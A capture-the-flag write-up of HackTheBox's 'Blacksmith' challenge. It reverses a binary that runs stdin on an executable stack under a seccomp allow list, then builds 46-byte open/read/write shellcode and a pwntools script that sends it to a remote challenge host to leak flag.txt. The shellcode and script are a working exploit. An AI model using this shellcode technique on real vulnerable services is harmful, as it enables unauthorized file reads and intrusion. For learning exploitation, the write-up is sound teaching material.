Blacksmith (HackTheBox)

Hey all. Today we're going to discuss the retired Blacksmith challenge on HackTheBox. The description on HackTheBox is as follows:

You are the only one who is capable of saving this town and bringing peace upon this land! You found a blacksmith who can create the most powerful weapon in the world! You can find him under the label "./flag.txt".

In this write-up, we will learn about seccomp, writing assembly, and performing syscalls.

Summary

  • First looks
  • Finding vulnerability primitives
  • Developing AMD64 (x86_64) assembly
  • Retrieving the flag

First looks

We are given the blacksmith executable binary. Upon running the binary, we are presented with a menu to trade items:

$ ./blacksmith
Traveler, I need some materials to fuse in order to create something really powerful!
Do you have the materials I need to craft the Ultimate Weapon?
1. Yes, everything is here!
2. No, I did not manage to bring them all!
> 1
What do you want me to craft?
1. sword
2. shield
3. bow
> 3
This bow's range is the best!
Too bad you do not have enough materials to craft some arrows too..
The program output

Usually, I start by checking the binary's security using pwntools' checksec. In this case, the security of blacksmith binary is:

$ checksec blacksmith
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
The checksec output

The fields in checksec mean the following:

  • Arch: the CPU architecture and instruction set (x86, ARM, MIPS, ...)
  • RELRO: Relocation Read-Only - secures the dynamic linking process
  • Stack Canaries: protects against stack buffer overflow attacks
  • NX: No eXecute - write-able memory cannot be executed
  • PIE: Position Independable Executable - address randomization
  • RWX: Read Write Execute - there's memory that's RWX

The logical conclusion is that we need to write a shellcode to the RWX memory to read out flag.txt (based on the challenge description).

Finding vulnerability primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork. An example of primitives working together is as follows:

  • an information leak primitive to leak an address
  • an arbitrary write primitive to control the execution flow

... which can work together by controlling the execution flow by writing a leaked address.

Main analysis

When I want to find vulnerability primitives, I open the binary in Ghidra, Ghidra is a reverse engineering tool developed by the NSA (yes, that NSA). I start off analyzing a binary at the main function. In this case, it looked like the following:

void main(void)
{
  size_t __n;
  long in_FS_OFFSET;
  int i_has_things;
  int i_option;
  char *local_20;
  char *local_18;
  long __can_token;
  
  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  setup();
  // ...
  __isoc99_scanf("%d",&i_has_things);
  if (i_has_things != 1) {
    puts("Farewell traveler! Come back when you have all the materials!");
    exit(34);
  }
  printf(s_What_do_you_want_me_to_craft?_1._001012e0);
  __isoc99_scanf("%d",&i_option);
  sec();
  if (i_option == 2) {
    shield();
  } else if (i_option == 3) {
    bow();
  } else if (i_option == 1) {
    sword();
  } else {
    write(STDOUT_FILENO,local_18,strlen(local_18));
    exit(261);
  }
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}
Decompilation of the main function

So, the main function does the following:

  1. setup()
  2. sec()
  3. shield(), bow() or sword()

In addition to that, the main function uses canary tokens in variable __can_token. As you can see, if __can_token is not equal to the original value, it means that stack corruption has been detected and hence, __stack_chk_fail is called which exits the program.

The function setup removes the buffer for stdout and stdin, which is standard and hence not interesting. In contrast, the sec function is interesting.

Sec function

void sec(void)

{
  void* ctx;
  long in_FS_OFFSET;
  long __can_token;
  
  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  // ...
                    // allow sys_read, sys_write, 
                    // sys_open, sys_exit
  ctx = seccomp_init(0);
  seccomp_rule_add(ctx,0x7fff0000,2,0);
  seccomp_rule_add(ctx,0x7fff0000,0,0);
  seccomp_rule_add(ctx,0x7fff0000,1,0);
  seccomp_rule_add(ctx,0x7fff0000,60,0);
  seccomp_load(ctx);
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}
The sec function

We can see that the sec function primarily creates an allow list using seccomp of the syscalls sys_read, sys_write, sys_open, and sys_exit. (Note that the naming convention for internal syscall functions is a sys_ prefix. When we say sys_read, we mean the syscall read.) By doing this, the developer of the program prevents us from executing our shell on the server since we would need to sys_execve("/bin/sh", NULL, NULL) for that. Because sys_execve is not on the allow list, we cannot use it. Remember this for later.

Shield analysis

Furthermore, we have the shield(), bow() or sword() calls in main(). The bow() and sword() functions crash the program before a user can give input, which means that's irrelevant. So basically, the vulnerability must be in shield().  

void shield(void)

{
  size_t strlen;
  long in_FS_OFFSET;
  char buf[72];
  long __can_token;
  
  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  strlen = ::strlen(s_Excellent_choice!_This_luminous_s_00101080);
  write(1,s_Excellent_choice!_This_luminous_s_00101080,strlen);
  strlen = ::strlen("Do you like your new weapon?\n> ");
  write(1,"Do you like your new weapon?\n> ",strlen);
  read(0,buf,63);
  (*(code *)buf)();
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
                    // WARNING: Subroutine does not return
    __stack_chk_fail();
  }
  return;
}
The shield function

What sticks out to me in this function is that we have user input and are calling a variable like a function using (*(code *)buf)();. The code (*(code *)buf)(); is equivalent to the ASM below:

00100dd9 48 8d 55     LEA       RDX, [RBP - 0x50]   ; code* RDX = &buf
         b0
00100ddd b8 00 00     MOV       RAX, 0x0
         00 00
00100de2 ff d2        CALL      RDX                 ; RDX()
ASM version of (*(code *)buf)();

The  (*(code *)buf)(); function call executes the buf variable on the stack as if it was assembly. This means we can inject assembly into the program.

Developing AMD64 (x64_86) assembly

We have an arbitrary execution primitive so we need to write an assembly payload. The difficulty with this is that:

  • We have 63 bytes to work with:
  // shield() function
  read(STDIN_FILENO,buf,63);
  (*(code *)buf)();
Part of the shield() function
  • We can only use sys_read, sys_write, sys_open and sys_exit:
  // sec() function
  // allow sys_read, sys_write, 
  // sys_open, sys_exit
  ctx = seccomp_init(0);
  seccomp_rule_add(ctx,0x7fff0000,2,0);
  seccomp_rule_add(ctx,0x7fff0000,0,0);
  seccomp_rule_add(ctx,0x7fff0000,1,0);
  seccomp_rule_add(ctx,0x7fff0000,60,0);
  seccomp_load(ctx);
Part of the sec() function
  • We do not have a stack address (ASLR)

However, the challenge description told us that we need to read the flag.txt file. Hence, the strategy for this payload is opening flag.txt, reading flag.txt into a buffer, and writing the buffer to stdout.

To interact with those files, we need to utilize system calls ("syscalls"). Syscalls are essentially an ABI (binary API) with the Linux kernel which is like the god of the operating system. The kernel provides memory management, CPU scheduling, driver management, hardware IO, et cetera. If you want to learn more about the kernel, the book "Linux Kernel Development" by Robert Love is an excellent way to learn more about the kernel (I've read it).

I used a Linux x64 syscall table as a reference for using the syscalls. Essentially the code should do the following:

// sys_open(char* filename, int flags, int mode)
int fd = sys_open("flag.txt", 0, 0);  

// sys_read(int fd, char* buf, size_t count)
int written = sys_read(fd, buf, 0x9999);

// sys_write(int fd, char* buf, size_t count)
sys_write(1, buf, written);
C pseudocode of the ASM payload

I came up with the following ASM:

mov rax, 2
lea rdi, [rip+41]  ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall

mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, 30
syscall

mov rdx, rax
mov rax, 1
mov rdi, rax
syscall
Payload used to leak flag.txt

Since we have only 63 bytes to work with, I had to be creative. In assembly, most bytes are allocated to constant values like mov rax, 2 since it will store an 8-byte 0x00000000 00000002 into the instruction. That means we can save a lot of bytes by reusing register values.

I eventually refactored the payload into 46 bytes:

push r10
inc r10
mov rax, r10
lea rdi, [rip+31]  ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall

mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall

mov rdx, rax
pop rax
mov rdi, rax
syscall
The final compressed ASM payload

Retrieving the flag

Now we have a steady payload, we need to send it to the application. I made the following script using pwntools:

#!/usr/bin/python3

from pwn import remote, gdb, ELF, asm, context
import time

e = ELF('blacksmith')

is_remote = True
if is_remote:
    p = remote("64.227.36.64", 32615)
else:
    p = e.process()

context.binary = e.path  # set the pwntools context for asm()

p.sendlineafter(b"all!\n> ", b'1')
p.sendlineafter(b"\xf0\x9f\x8f\xb9\n> ", b'2')  # get to shield()

payload = asm(f'''push r10
inc r10
mov rax, r10
lea rdi, [rip+31]
xor rsi, rsi
xor rdx, rdx
syscall

mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall

mov rdx, rax
pop rax
mov rdi, rax
syscall''')

print(f"writing ASM with {len(payload)} bytes")

# payload = payload + filler + filename
payload += b"flag.txt"
print(f"writing ASM+filename with {len(payload)} bytes")

p.sendafter(b"weapon?\n> ", payload)
while True:
    print(p.recvline())
The final script used for sending the payload to the application